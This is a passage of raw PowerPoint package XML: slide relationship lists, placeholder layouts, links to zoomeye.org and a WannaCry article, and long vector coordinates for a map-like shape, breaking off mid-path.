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63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide62.xml" /><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide67.xml" /><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide75.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml" /><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide70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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28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66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide65.xml" /><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide73.xml" /><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml" /><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide60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73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide72.xml" /><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml" /><Relationship Id="rId81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slide" Target="slides/slide63.xml" /><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide68.xml" /><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1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slide" Target="slides/slide71.xml" /><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1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slide" Target="slides/slide66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slide" Target="slides/slide69.xml" /><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide74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文本"/>
          <p:cNvSpPr txBox="1"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r>
              <a:t>–Johnny Appleseed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95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9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像"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346200" y="520700"/>
            <a:ext cx="10388600" cy="5860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标题文本"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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文本"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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图像"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="609600"/>
            <a:ext cx="5359400" cy="7759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0" name="标题文本"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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41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图像"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6870700" y="2781300"/>
            <a:ext cx="5283200" cy="618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正文级别 1…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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图像"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654800" y="5029200"/>
            <a:ext cx="5803900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quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664613" y="508000"/>
            <a:ext cx="5803901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图像"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="508000"/>
            <a:ext cx="580823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image" Target="../media/image2.tif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image" Target="../media/image1.jpe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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图像" descr="图像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36635" y="-4246"/>
            <a:ext cx="1987842" cy="10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11.jpeg" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png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6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zoomeye.org" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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17.png" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png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6.xml" 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 /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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 /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.tif" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6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WannaCry_ransomware_attack" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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24.png" 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 /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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6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 /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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 /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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 /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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6.xml" 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 /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" 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6.gif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环太平洋"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725858" y="591066"/>
            <a:ext cx="7553084" cy="7553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7720" y="0"/>
                  <a:pt x="4944" y="1303"/>
                  <a:pt x="2974" y="3378"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2840" y="3517"/>
                  <a:pt x="2709" y="3662"/>
                  <a:pt x="2580" y="3813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2532" y="3869"/>
                  <a:pt x="2481" y="3923"/>
                  <a:pt x="2434" y="3981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2271" y="4181"/>
                  <a:pt x="2114" y="4391"/>
                  <a:pt x="1963" y="4611"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1837" y="4789"/>
                  <a:pt x="1722" y="4975"/>
                  <a:pt x="1608" y="5161"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="595" y="6805"/>
                  <a:pt x="0" y="8732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0800" y="54"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10840" y="54"/>
                  <a:pt x="10879" y="57"/>
                  <a:pt x="10918" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10921" y="57"/>
                  <a:pt x="10924" y="57"/>
                  <a:pt x="10928" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11109" y="59"/>
                  <a:pt x="11289" y="65"/>
                  <a:pt x="11468" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11469" y="76"/>
                  <a:pt x="11470" y="76"/>
                  <a:pt x="11470" y="76"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11497" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11371" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11475" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11658" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11933" y="126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12108" y="136"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12132" y="139"/>
                  <a:pt x="12155" y="142"/>
                  <a:pt x="12179" y="145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12106" y="140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11899" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11736" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11623" y="126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11497" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11318" y="108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11063" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10857" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10709" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10517" y="125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10436" y="135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10356" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10376" y="175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10514" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10563" y="207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10635" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10807" y="221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10903" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11041" y="263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10997" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11103" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11217" y="399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11280" y="446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11349" y="428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11458" y="384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11610" y="372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11667" y="404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11751" y="421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11749" y="481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11724" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11881" y="547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11896" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11982" y="618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12047" y="648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12128" y="646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12212" y="668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12342" y="714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12411" y="714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12463" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12468" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12628" y="566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12552" y="512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12525" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12547" y="443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12635" y="433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12783" y="438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12970" y="465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12924" y="434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12945" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13054" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13155" y="399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13268" y="458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13283" y="498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13258" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13190" y="544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13293" y="579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13450" y="631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13524" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13623" y="724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13655" y="761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13717" y="805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13848" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13986" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13970" y="954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13904" y="934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13800" y="912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13801" y="927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13956" y="971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13917" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14020" y="1067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13909" y="1096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13880" y="1099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13892" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13946" y="1079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13896" y="1028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13848" y="1020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13811" y="1062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13823" y="1103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13827" y="1104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13806" y="1106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13623" y="1106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13460" y="1096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13364" y="1064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13303" y="1089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13210" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13103" y="1047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12965" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12911" y="1064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12778" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12721" y="1106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12672" y="1066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12566" y="1044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12384" y="1047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12345" y="1076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12357" y="1123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12275" y="1145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12248" y="1180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12296" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12376" y="1274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12453" y="1306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="1236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12652" y="1199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12776" y="1180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12783" y="1242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12702" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12719" y="1345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12867" y="1331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12776" y="1392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12860" y="1449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12766" y="1458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12731" y="1559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12737" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12785" y="1651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12919" y="1638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13039" y="1576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13020" y="1523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13024" y="1459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13148" y="1419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13192" y="1443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13310" y="1422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13212" y="1468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13263" y="1532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13330" y="1549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13392" y="1517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13470" y="1564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13572" y="1608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13611" y="1687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13678" y="1722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13660" y="1778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13668" y="1815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13719" y="1840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="1880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13855" y="1894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13864" y="1842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13981" y="1867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13951" y="1926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14013" y="1954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14148" y="2059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14192" y="2136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14064" y="2091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14045" y="2156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14093" y="2193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14118" y="2252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14145" y="2353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14130" y="2421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14156" y="2471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14214" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14276" y="2533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14158" y="2545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14305" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14202" y="2671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14200" y="2700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14283" y="2708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14340" y="2740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14286" y="2769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14364" y="2840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14466" y="2909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14473" y="2974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14547" y="3033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14633" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14633" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14571" y="3190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14550" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14537" y="3314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14497" y="3375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14534" y="3441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14515" y="3471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14505" y="3553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14453" y="3634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14470" y="3685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14438" y="3744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14396" y="3730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14380" y="3801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14412" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14328" y="3838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14283" y="3890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14364" y="3988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14343" y="4023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14401" y="4136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14409" y="4186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14476" y="4265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14557" y="4313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14614" y="4405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14589" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14665" y="4560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14746" y="4521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14835" y="4510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14931" y="4515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15017" y="4483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15133" y="4489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15104" y="4604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15023" y="4555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15008" y="4597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15044" y="4755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15081" y="4865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15205" y="4851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15281" y="4866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15352" y="4806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15362" y="4718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15412" y="4693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15380" y="4658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15362" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15370" y="4545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15422" y="4617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15461" y="4600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15540" y="4627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15579" y="4696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15552" y="4732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15616" y="4819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15577" y="4846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15572" y="4900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15648" y="4967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15719" y="5068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15801" y="5146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15887" y="5139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15976" y="5193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16032" y="5173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16124" y="5163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16123" y="5060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16192" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16245" y="5095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16341" y="5144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16353" y="5104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16309" y="4999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16394" y="5018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16341" y="4969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16432" y="4969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16383" y="4900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16415" y="4893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16382" y="4789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16469" y="4873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16587" y="4949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16631" y="5033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16660" y="5067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16729" y="5222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16782" y="5296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16774" y="5397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16833" y="5530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16855" y="5632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16895" y="5762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16924" y="5769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16927" y="5610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16897" y="5514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16868" y="5405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16843" y="5309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16868" y="5265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16821" y="5141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16754" y="5075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16695" y="4917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16628" y="4861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16589" y="4765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16532" y="4656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16424" y="4535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16341" y="4548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16234" y="4400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16128" y="4308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16038" y="4188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16079" y="4186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16129" y="4277"/>
                </a:lnTo>
                <a:lnTo>
